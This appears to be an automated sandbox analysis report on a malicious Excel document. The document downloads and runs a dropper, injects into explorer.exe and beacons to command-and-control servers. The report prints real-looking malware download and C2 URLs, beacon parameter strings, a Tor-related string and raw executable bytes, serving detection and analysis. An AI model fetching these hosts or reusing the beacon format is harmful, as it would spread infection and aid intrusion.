Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001D5A05 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	5_2_001D5A05
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001D9F28 LdrInitializeThunk,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	5_2_001D9F28
Source: C:\Windows\explorer.exe	Code function: 20_2_05377BE4 RtlAllocateHeap,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege,	20_2_05377BE4

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_001C580F wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

5_2_001C580F

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\0n1ine[1].exe			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\sxibiNa\ZpsvnMb\CVPFktt.exe			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: 0n1ine[1].exe.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Process created: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2022566 ET TROJAN Possible Malicious Macro EXE DL AlphaNumL 192.168.1.102:49709 -> 85.239.35.110:80
Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.1.102:49709 -> 85.239.35.110:80

Creates a COM Internet Explorer object

Show sources

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Found Tor onion address

Show sources

Source: CVPFktt.exe, 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: CVPFktt.exe, 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp	String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.10.3 (Ubuntu)Date: Wed, 27 May 2020 08:30:46 GMTContent-Type: application/octet-streamContent-Length: 167424Last-Modified: Wed, 27 May 2020 08:30:02 GMTConnection: keep-aliveETag: "5ece250a-28e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4b 61 e0 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 be 01 00 00 56 44 00 00 00 00 00 73 04 01 00 00 10 00 00 00 d0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 46 00 00 04 00 00 1c 32 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 c7 01 00 28 00 00 00 00 70 45 00 50 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 bd 01 00 00 10 00 00 00 be 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 20 73 43 00 00 d0 01 00 00 2c 00 00 00 c2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 65 76 69 64 75 00 00 14 00 00 00 50 45 00 00 06 00 00 00 ee 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 98 00 00 00 70 45 00 00 9a 00 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View

ASN Name: unknown unknown

Source: global traffic	HTTP traffic detected: GET /0n1ine.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gstat.ddoborguild.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/YqDbBmJ03/HYNI5QMFQ8KnA0Xlg2l4/IETRZjPpb2nK14jcJh7/OeJxoopStvUXHEz47drnw5/oWWDMZhUKORHw/illHxVP8/_2F_2FqJ9TdlRGk6Rd0_2BD/fm9UfWK99O/jXxQB7II3lMb6Vbk5/0fe74JetcpI/2xLI.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: line.beibiandmom.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: line.beibiandmom.comConnection: Keep-AliveCookie: PHPSESSID=qi33dci21u6eo799r71ifb9d03; lang=en
Source: global traffic	HTTP traffic detected: GET /images/t9bICS3iYBibv2PUw120w/zrQnDc3C1vDoaX9b/MyXydjBSzbjp_2B/WxqBHRpL0Pbm6ZFBzL/GosOdeA0A/lXg5KR2wNHrBWWmgpwK2/2N2Dl0xmBlO08ZoSXlZ/gJF0VSPK0OHiMUWp2tnn4b/jxE9PAGTU/lXz.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: line.beibiandmom.comConnection: Keep-AliveCookie: lang=en
Source: global traffic	HTTP traffic detected: GET /images/3_2FaICNUesWBp6cSMSOvh/R7KiXoQV8WPnC/Gi5kIny8/M1v_2BPzvRNcy_2BKgs8L4Q/hKfV7HFmnL/iMeEq89GLPuG00D9I/_2FkLuvkpKF8/RCMI7F_2BZd/0qw1rsLjdDv5Qk/OfpxfZVdeyjHI411VH04a/uGhCwSB2/A.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: line.beibiandmom.comConnection: Keep-AliveCookie: lang=en

Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: gstat.ddoborguild.com

Source: explorer.exe, 00000014.00000000.917616160.000000000E880000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.917616160.000000000E880000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: CVPFktt.exe, control.exe, 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, explorer.exe, 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: CVPFktt.exe, 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, control.exe, 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, explorer.exe, 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: CVPFktt.exe, 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, CVPFktt.exe, 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, control.exe, 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, explorer.exe, 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000014.00000002.958310392.00000000009F0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000018.00000000.927450284.000002086BD90000.00000002.00000001.sdmp	String found in binary or memory: http://line.beibiandmom.com/images/3_2FaICNUesWBp6cSMSOvh/R7KiXoQV8WPnC/Gi5kIny8/M1v_2BPzvRNcy_
Source: explorer.exe, 00000014.00000000.909700398.0000000004FE0000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.894079394.00000000027A0000.00000004.00000001.sdmp, explorer.exe, 00000014.00000002.984862867.0000000006EC9000.00000004.00000001.sdmp, explorer.exe, 00000014.00000002.981761481.0000000004FE0000.00000004.00000001.sdmp	String found in binary or memory: http://line.beibiandmom.com/images/3_2FaICNUesWBp6cSMSOvh/R7KiXoQV8WPnC/Gi5kIny8/M1v_2BPzvRNcy_2BKgs
Source: explorer.exe, 00000014.00000002.958310392.00000000009F0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000018.00000000.927450284.000002086BD90000.00000002.00000001.sdmp	String found in binary or memory: http://line.beibiandmom.com/images/YqDbBmJ03/HYNI5QMFQ8KnA0Xlg2l4/IETRZjPpb2nK14jcJh7/OeJxoopSt
Source: explorer.exe, 00000014.00000000.909700398.0000000004FE0000.00000004.00000001.sdmp	String found in binary or memory: http://line.beibiandmom.com/images/YqDbBmJ03/HYNI5QMFQ8KnA0Xlg2l4/IETRZjPpb2nK14jcJh7/OeJxoopStvUXHE
Source: explorer.exe, 00000014.00000002.984820397.0000000006EB6000.00000004.00000001.sdmp	String found in binary or memory: http://line.beibiandmom.com/images/t9bICS3iYBibv2PUw120w/zrQnDc3C1vDoaX9b/MyXydjBSzbjp_2B/WxqBHRpL0P
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
